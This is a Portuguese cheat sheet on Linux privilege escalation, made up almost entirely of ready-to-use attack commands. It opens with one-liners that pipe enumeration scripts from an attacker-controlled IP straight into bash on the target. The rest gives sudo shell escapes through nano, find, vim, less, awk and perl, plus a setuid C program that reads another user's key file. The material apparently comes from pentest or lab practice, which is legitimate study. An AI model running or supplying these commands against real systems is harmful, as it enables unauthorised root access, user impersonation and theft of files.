Cheat Sheet :: Escalação de privilégios

Usando scripts para enumerar a máquina

• https://github.com/rebootuser/LinEnum

• https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

• Na máquina alvo podemos fazer:

1
2

curl 10.10.14.2/linpeas.sh | bash
curl 10.10.14.2/LinEnum.sh | bash

Escalação de privilégio com Nano

• Isso pode ser usado para obter acesso root no servidor.

1

sudo -u root /bin/nano /opt/priv

• O Nano permite inserir arquivos externos no arquivo atual usando o atalho.

1

Ctrl+R

/pics/nano-001.png

• O comando revela que podemos executar comandos do sistema usando ^X (Pressione Ctrl + X) e digite o comando abaixo para abrir um shell.

1
2

Pressione Ctrl + X
reset; sh 1>&0 2>&0

/pics/nano-002.png

• Agora temos um shell root. /pics/nano-003.png

Escalação de privilégios via sudo

Listando comandos sudo permitidos

1

sudo -l

Impersonando com sudo

1

sudo -u victim command

Escalando privilégios com o comando find

1

sudo -u victim /usr/bin/find -exec /bin/bash \;

Escalando privilégios com o editor vim

1
2
3
4

sudo -u victim /usr/bin/vim

# Dentro do vim podemos chamar um shell
:!/bin/bash

Escalando privilégios com o comando less

• Abrir um arquivo usando less

1

sudo -u victim less /home/victim/key.txt

• Dentro do less podemos chamar um shell

1

!/bin/bash

Escalando privilégios com o comando awk

1
2
3
4
5

# Lendo arquivos com awk
sudo -u victim /usr/bin/awk '{print $1}' /home/victim/key.txt

# Executando comando dentro do awk
sudo -u victim /usr/bin/awk 'BEGIN {system("/bin/bash")}'

Escalando privilégios com chmod

• Crie o exploit para chamar um comando

1
2
3
4
5
6

#include<stdio.h>

int main(void)
{
    system("cat /home/victim/key.txt");
}

• Compilando o exploit

1
2

cd /tmp
gcc exploit.c -o exploit

• Definindo as flags setuid e setgid

1
2
3

sudo -u victim cp exploit exploit2
sudo -u victim chmod +xs exploit2
./exploit2

Escalando privilégios com perl

1

sudo -u victim perl -e 'exec "/bin/bash";'